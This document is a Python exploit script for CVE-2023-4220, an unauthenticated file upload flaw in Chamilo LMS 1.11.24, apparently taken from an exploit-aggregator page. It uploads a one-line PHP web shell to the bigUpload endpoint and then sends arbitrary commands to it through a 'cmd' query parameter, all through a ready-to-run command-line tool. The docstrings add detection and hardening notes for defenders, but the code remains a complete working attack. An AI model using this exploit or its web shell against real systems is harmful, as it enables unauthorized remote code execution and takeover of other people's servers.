## https://sploitus.com/exploit?id=PACKETSTORM:189976
# Exploit Title: Chamilo LMS 1.11.24 - Remote Code Execution (RCE)
    # Exploit Author: 0x00-null - Mohamed Kamel BOUZEKRIA
    # Exploit Date: September 3, 2024
    # Vendor Homepage: https://chamilo.org/
    # Software Link: https://chamilo.org/
    # Version: 1.11.24 (Beersel)
    # Tested Versions: 1.11.24 (Beersel) - August 31, 2023
    # CVE ID: CVE-2023-4220
    # Vulnerability Type: Remote Code Execution
    # Description: Unauthenticated remote code execution in Chamilo LMS <= 1.11.24 due to an unrestricted file upload vulnerability.
    # Proof of Concept: Yes
    # Categories: Web Application, Remote Code Execution, File Upload
    # CVSS Score: 8.1 (High)
    # CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    # Notes: The issue is only reachable when the /main/inc/lib/javascript/bigupload/files/ directory exists and is writable by the web server.
    # License: MIT License
    # References:
    # - CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220
    # - Exploit Documentation: https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit
    # - Vendor Advisory: https://chamilo.org/
    
    import requests
    import argparse
    from urllib.parse import urljoin
    
    def upload_shell(target_url, payload_name):
        """Send the unauthenticated bigUpload POST that CVE-2023-4220 describes.

        Builds the bigUpload endpoint URL and the URL where the uploaded file
        would be served, submits one multipart field named ``bigUploadFile``
        with no session or credentials, and prints a status line. Returns None.

        Args:
            target_url: Base URL of the Chamilo LMS instance.
            payload_name: File name used for the uploaded file.

        Defender notes:
            * Detection: a POST to ``bigUpload.php?action=post-unsupported``
              from a client with no authenticated session, followed by a new
              ``.php`` file under ``bigupload/files/``.
            * Hardening: apply the vendor fix for CVE-2023-4220 (the header
              lists 1.11.24 and earlier as affected) and configure the web
              server so that nothing in the upload directory is executed
              as PHP.
            * Success here is judged by HTTP 200 alone; the response body is
              not inspected, so the printed result is not proof that a file
              was stored.
        """
        endpoint = urljoin(
            target_url,
            "main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported",
        )
        stored_at = urljoin(
            target_url,
            f"/main/inc/lib/javascript/bigupload/files/{payload_name}",
        )

        # Multipart form: field name, file name, file content and content type.
        body = '<?php system($_GET["cmd"]); ?>'
        multipart = {'bigUploadFile': (payload_name, body, 'application/x-php')}

        reply = requests.post(endpoint, files=multipart)

        if reply.status_code != 200:
            print("[-] File upload failed.")
            return

        print("[+] File uploaded successfully!")
        print(f"[+] Access the shell at: {stored_at}?cmd=")
    
    def execute_command(shell_url, cmd):
        """Issue one GET to the uploaded file with ``cmd`` in the query string.

        Prints the response body on HTTP 200 and a failure line otherwise.
        Returns None.

        Args:
            shell_url: URL of the previously uploaded file.
            cmd: Value placed after ``?cmd=`` exactly as given.

        Defender notes:
            * The value travels in the URL, so it typically shows up in
              web-server access logs; GET requests to files under
              ``bigupload/files/`` carrying a ``cmd`` parameter are a
              high-signal indicator.
            * If PHP execution is disabled for the upload directory, the
              server returns the file contents or an error instead of
              command output.
        """
        request_url = f"{shell_url}?cmd={cmd}"
        reply = requests.get(request_url)

        if reply.status_code != 200:
            print(f"[-] Failed to execute command at {shell_url}")
            return

        print(f"[+] Command Output:\n{reply.text}")
    
    if __name__ == "__main__":
        # Command-line interface: base URL, command string, optional file name.
        cli = argparse.ArgumentParser(
            description="CVE-2023-4220 Chamilo LMS Unauthenticated File Upload RCE Exploit"
        )
        cli.add_argument(
            'target_url',
            help="The target base URL of the Chamilo LMS instance (e.g., http://example.com/)",
        )
        cli.add_argument('cmd', help="The command to execute on the remote server")
        cli.add_argument(
            '--shell',
            default='rce.php',
            help="The name of the shell file to be uploaded (default: rce.php)",
        )
        options = cli.parse_args()

        # Step 1: the upload request. Its outcome is only printed, not returned.
        upload_shell(options.target_url, options.shell)

        # Step 2: one GET to the uploaded file. Seen from the server, the POST to
        # bigUpload.php followed by a GET under bigupload/files/ from the same
        # client is the sequence to alert on.
        uploaded_at = urljoin(
            options.target_url,
            f"main/inc/lib/javascript/bigupload/files/{options.shell}",
        )
        execute_command(uploaded_at, options.cmd)